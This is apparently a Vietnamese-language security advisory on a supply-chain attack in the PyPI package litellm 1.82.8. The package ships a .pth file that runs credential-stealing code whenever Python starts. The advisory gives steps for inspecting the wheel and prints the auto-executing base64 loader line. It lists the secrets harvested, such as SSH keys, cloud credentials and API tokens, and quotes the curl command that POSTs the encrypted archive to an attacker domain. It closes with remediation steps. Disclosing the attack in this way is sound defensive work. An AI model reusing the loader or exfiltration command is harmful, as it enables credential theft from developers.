Tóm Tắt
Gói litellm==1.82.8 trên PyPI chứa một file .pth độc hại (litellm_init.pth, 34,628 bytes) tự động thi hành mã đánh cắp thông tin xác thực mỗi khi Python khởi động — không cần import litellm. Đây là một cuộc tấn công vào chuỗi cung ứng.
Tái Hiện Vấn Đề
Sử dụng lệnh sau để tải về và kiểm tra:
pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
pth = [n for n in z.namelist() if n.endswith('.pth')]
print('PTH files:', pth)
for p in pth:
print(z.read(p)[:300])
"Bạn sẽ thấy nội dung của litellm_init.pth như sau:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"])Phân Tích Chi Tiết Mã Độc
Giai Đoạn 1: Thu Thập Thông Tin
Mã độc thu thập dữ liệu nhạy cảm từ hệ thống:
- Thông tin hệ thống:
hostname,whoami,uname -a,ip addr,ip route - Biến môi trường chứa API keys, tokens…
- Khóa SSH và thông tin xác thực từ các cloud services như AWS, GCP, Azure.
- Lịch sử shell, tệp cấu hình quản lý gói, và nhiều dữ liệu nhạy cảm khác.
Giai Đoạn 2: Mã Hóa và Trích Xuất
- Dữ liệu thu thập được ghi vào tệp tạm thời.
- Khóa phiên mã hóa AES-256 được tạo ngẫu nhiên.
- Dữ liệu được mã hóa với
openssl enc -aes-256-cbc -pbkdf2. - Khóa AES được mã hóa với khóa công khai RSA 4096-bit.
- Tập tin được đóng gói lại và gửi đi qua URL độc hại.
curl -s -o /dev/null -X POST \
"https://models.litellm.cloud/" \
-H "Content-Type: application/octet-stream" \
-H "X-Filename: tpcp.tar.gz" \
--data-binary @tpcp.tar.gzHậu Quả
Người dùng cài đặt litellm==1.82.8 có thể bị mất toàn bộ biến môi trường và thông tin bảo mật.
Phiên Bản Bị Ảnh Hưởng
- Xác nhận:
litellm==1.82.8 - Các phiên bản khác chưa kiểm tra.
Hành Động Khuyến Nghị
- PyPI: Gỡ bỏ ngay lập tức litellm 1.82.8.
- Người dùng: Kiểm tra
litellm_init.pthtrong thư mụcsite-packages/. - Người dùng: Đổi tất cả thông tin xác thực, API keys.
- BerriAI: Kiểm tra bảo mật quá trình đóng gói và phát hành.
Môi Trường
- OS: Ubuntu 24.04 (Docker container)
- Python: 3.13
- Discovered: 24/03/2026